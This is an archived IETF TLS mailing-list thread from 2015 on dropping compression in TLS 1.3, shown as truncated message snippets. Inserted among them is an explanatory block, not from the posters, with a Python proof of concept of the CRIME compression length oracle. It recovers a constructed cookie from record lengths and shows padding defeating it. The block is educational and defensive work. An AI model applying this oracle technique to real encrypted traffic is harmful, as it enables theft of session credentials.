Re: [TLS] TLS 1.3 - Support for compression to be removed

2015-10-03 Thread Daniel Kahn Gillmor
On Fri 2015-10-02 12:24:24 -0400, Martin Rex wrote: > The value of real padding is highly dependent on whether and how it > will actually get used, and is far from automatic. Sure, but we have no existing mechanism to do that in TLS 1.2 or earlier. We need the mechanism before anyone can establis

Re: [TLS] TLS 1.3 - Support for compression to be removed

2015-10-03 Thread Ilari Liusvaara
On Sat, Oct 03, 2015 at 12:02:38PM -0400, Daniel Kahn Gillmor wrote: > On Fri 2015-10-02 12:24:24 -0400, Martin Rex wrote: > > > But the collateral damage is that you break stuff that feeds on the > > outer record layer structure and state, which can easily push adoption > > of TLSv1.3 from the 5-

Re: [TLS] TLS 1.3 - Support for compression to be removed

2015-10-03 Thread takamichi saito
On 2015/10/02, at 22:59, Roland Zink wrote: > Browsers are not a concern as they already have their own comp/decomp codes. > HTTP/1 can compress content (Content-encoding and transfer-encoding) and > HTTP2 has additional header compression. > > Regards, > Roland > I see, but on the contrary, TLS is

Re: [TLS] TLS 1.3 - Support for compression to be removed

2015-10-03 Thread takamichi saito
On 2015/10/03, at 0:24, Salz, Rich wrote: > >> 1) We know the CRIME threat, but it cannot be a risk for everyone. >> e.g., CVSS v2 Base Score: 2.6 (LOW) > > CVSS isn't always appropriate; CVSS2 called Heartbleed a 5; CVSS v3 called it > 7.5 > We know it, but it is one of the indicators. How can you say the
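The two things this thread keeps circling are the CRIME-style length leak that TLS-level compression introduces (the message above) and the record padding that TLS 1.2 lacks (Daniel Kahn Gillmor's message earlier in the thread). The following is an added example, not code from any of the posters: a constructed HTTP request in which the attacker controls the query string and the browser appends a cookie, both compressed with zlib into the same record. Everything here is assumed for illustration: the request layout, the cookie name and value, the choice of zlib's Z_FIXED strategy (fixed Huffman tables, so that one extra matched byte saves exactly one byte and the signal is not blurred by per-message Huffman tree changes, which a real attacker would have to average out), and the 128-byte padding granularity used to model TLS 1.3-style record padding.

```python
"""
CRIME-style length oracle against a compress-then-encrypt record,
reduced to its core. Added example; all data below is constructed.
"""
import zlib

# Constructed sample: the "browser" appends this cookie to every request.
SECRET_PREFIX = "Cookie: session_id="   # 19 bytes, known to the attacker
SECRET_VALUE = "7f3a9c0e5b2d"           # 12 hex digits, what the attacker wants
HEX = "0123456789abcdef"


def deflate_len(plaintext: bytes) -> int:
    """Compressed size in bytes.

    Z_FIXED (fixed Huffman tables) is a simplifying assumption: it makes the
    LZ77 match length the only thing that moves the size, so one extra
    matched byte saves exactly one byte. Against default zlib the attacker
    sees Huffman noise on top and has to repeat measurements or use
    alignment tricks; the leak itself is the same.
    """
    c = zlib.compressobj(level=9, strategy=zlib.Z_FIXED)
    return len(c.compress(plaintext) + c.flush())


def build_request(attacker_text: str, secret: str = SECRET_VALUE) -> bytes:
    """One request as the compressor sees it: attacker-chosen text first
    (here the query string), the secret cookie later in the same record."""
    return (
        f"GET /?q={attacker_text} HTTP/1.1\r\n"
        "Host: example.test\r\n"
        f"{SECRET_PREFIX}{secret}\r\n\r\n"
    ).encode()


def compressed_oracle(attacker_text: str) -> int:
    """What a passive observer learns from the wire: the record length.
    Encryption hides the bytes; compression makes the length depend on them."""
    return deflate_len(build_request(attacker_text))


def padded_oracle(attacker_text: str, block: int = 128) -> int:
    """Same record, padded up to a multiple of `block` before encryption,
    the kind of record-layer padding TLS 1.3 offers and TLS 1.2 lacks."""
    n = deflate_len(build_request(attacker_text))
    return -(-n // block) * block   # round up to a multiple of block


def recover(oracle, prefix=SECRET_PREFIX, length=len(SECRET_VALUE), alphabet=HEX):
    """Recover `length` secret bytes one at a time.

    For each position, try every candidate byte after the known prefix and
    keep the one whose record is uniquely shortest: the compressor found one
    more byte of back-reference into the real cookie. Stops as soon as the
    oracle gives no unique winner, i.e. the lengths no longer leak.
    Returns (recovered_bytes, completed).
    """
    known = ""
    for _ in range(length):
        sizes = {c: oracle(prefix + known + c) for c in alphabet}
        shortest = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == shortest]
        if len(winners) != 1:
            return known, False
        known += winners[0]
    return known, True


if __name__ == "__main__":
    print("unpadded:", recover(compressed_oracle))   # ('7f3a9c0e5b2d', True)
    print("padded:  ", recover(padded_oracle))       # ('', False): nothing leaks
```

The point the example makes in code: with compression and no padding, sixteen guesses per byte recover the whole cookie from lengths alone, which is why removing compression from TLS 1.3 is not optional hardening. Padding the record to a fixed granularity collapses the one-byte differences and the search finds no unique winner at the very first position; the same padding mechanism also helps against length leaks that have nothing to do with compression, which is the "real padding" point made earlier in the thread.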

Re: [TLS] TLS 1.3 - Support for compression to be removed

2015-10-03 Thread Eric Rescorla
On Sat, Oct 3, 2015 at 3:36 PM, takamichi saito wrote: > > On 2015/10/02, at 22:59, Roland Zink wrote: > > > Browsers are not a concern as they already have their own comp/decomp > codes. HTTP/1 can compress content (Content-encoding and transfer-encoding) > and HTTP2 has additional header compre

Re: [TLS] TLS 1.3 - Support for compression to be removed

2015-10-03 Thread Yoav Nir
> On Oct 4, 2015, at 1:44 AM, takamichi saito wrote: > > > On 2015/10/03, at 0:24, Salz, Rich wrote: > >> >>> 1) We know the CRIME threat, but it cannot be a risk for everyone. >>> e.g., CVSS v2 Base Score: 2.6 (LOW) >> >> CVSS isn't always appropriate; CVSS2 called Heartbleed a 5; CVSS v3 called